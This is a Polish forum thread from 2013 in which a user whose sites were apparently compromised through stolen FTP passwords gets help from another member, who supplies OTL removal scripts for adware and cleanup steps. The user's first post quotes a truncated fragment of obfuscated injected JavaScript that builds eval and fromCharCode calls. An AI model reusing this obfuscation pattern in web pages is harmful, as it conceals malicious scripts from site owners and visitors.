siwy1991 Opublikowano 28 Marca 2013 Zgłoś Udostępnij Opublikowano 28 Marca 2013 Witajcie, mam dość powszechny problem dotyczący Cyberprzestępczości: mianowicie, posiadam zainstalowanego Firewalla Comodo. Podczas właczonego comodo system działa w miare poprawnie, natomiast jeśli go wyłączę od razu pojawia mi się komunikat o cyberprzestępczości. Dodatkowo posiadam program Total Commander, a w nim połączenia FTP do 10 różnych stron www. Śmiem wątpić że miałem włamanie na komputer i za jego pośrednictwem zostały wykradzione hasło do stron www z którymi się łączyłem, mianowicie każda ze stron została zawirusowana malwarem: Coś ala:\ /*8f4d8e*/ ff=String;fff="fromCharCode";ff=ff[fff];zz=3;try{document.body&=5151}catch(gdsgd){v="eva"+"l";if(document)try{document.body=12;}catch(gdsgsdg){vzs=0;try{document;}catch(q){vzs=1;}}if(!vzs)e=window[v];if(1){f=new Array(045,0143,0162,0153,0140,0161,0146,0154,0153,035,045,046,035,0170,012,07,035,035,035,035,0163,0136,0157,035,0156,0157,035,072,035,0141,0154,0140,0/*8f4d8e*/ W załączniku świeże logi. Mam też problem z reklamami "Browsers to save", strasznie mulą mi przeglądarke i zwiększają ładowanie stron! Z góry dziękuję za pomoc. OTL.TxtPobieranie informacji ... Extras.TxtPobieranie informacji ... Odnośnik do komentarza
Landuss Opublikowano 30 Marca 2013 Zgłoś Udostępnij Opublikowano 30 Marca 2013 1. Uruchom OTL i w oknie Własne opcje skanowania/Skrypt wklej następujący tekst: :OTL O2 - BHO: (ByrrowSe2suave) - {78CD0B4A-6C07-8FA9-FE0B-6374BC98AE8B} - C:\ProgramData\ByrrowSe2suave\514fa67688a48.dll File not found O2 - BHO: (Browyse2Saave) - {B3E11438-71A0-82E1-0BD7-FBD1DD500527} - C:\ProgramData\Browyse2Saave\51465449ad033.dll File not found O3 - HKLM\..\Toolbar: (no name) - Locked - No CLSID value found. O20 - AppInit_DLLs: (c:\progra~2\browse~1\sprote~1.dll) - c:\progra~2\browse~1\sprote~1.dll () :Files C:\Users\Maciek\3703186.dll C:\ProgramData\Browyse2Saave C:\Program Files (x86)\BrowseToSave C:\ProgramData\Microsoft\Windows\Start Menu\Programs\ByrrowSe2suave :Commands [emptytemp] Adnotacja dla innych czytających: skrypt unikatowy - dopasowany tylko i wyłącznie pod ten system, proszę nie stosować na swoich systemach. Kliknij w Wykonaj skrypt. Zatwierdź restart komputera. 2. Wyczyść Firefox: menu Pomoc > Informacje dla pomocy technicznej > Zresetuj program Firefox. 3. Uruchom AdwCleaner z opcji Usuń. 4. Uruchamiasz OTL ponownie, tym razem wywołujesz opcję Skanuj. Pokazujesz nowy log z OTL (bez extras) Odnośnik do komentarza
siwy1991 Opublikowano 30 Marca 2013 Autor Zgłoś Udostępnij Opublikowano 30 Marca 2013 Cześć, dziękuję za pomoc w załączniku nowe logi OTL, po twoich zaleceniach. OTL.TxtPobieranie informacji ... Odnośnik do komentarza
Landuss Opublikowano 30 Marca 2013 Zgłoś Udostępnij Opublikowano 30 Marca 2013 Wszystko wygląda dobrze według najnowszego loga. Możemy kończyć: 1. Odinstal;uj RegClean Pro. Uruchom OTL i w sekcji Własne opcje skanowania / skrypt wklej: :Files C:\ProgramData\BetterSoft C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Browyse2Saave C:\windows\tasks\schedule!3036567561.job C:\windows\tasks\RegClean Pro_DEFAULT.job C:\windows\tasks\RegClean Pro_UPDATES.job C:\windows\DeleteOnReboot.bat :Commands [emptytemp] Klik w Wykonaj skrypt. 2. Użyj opcji Sprzątanie w OTL. 3. Opróżnij przywracanie systemu: KLIK 4. Zaktualizuj wymienione programy do najnowszych wersji: "{26A24AE4-039D-4CA4-87B4-2F86416026FF}" = Java 6 Update 26 (64-bit) "{26A24AE4-039D-4CA4-87B4-2F83217000FF}" = Java 7 "{AC76BA86-7AD7-1045-7B44-AA1000000001}" = Adobe Reader X (10.1.0) - Polish "Mozilla Thunderbird 17.0.4 (x86 pl)" = Mozilla Thunderbird 17.0.4 (x86 pl) Szczegóły aktualizacyjne: KLIK Odnośnik do komentarza
Rekomendowane odpowiedzi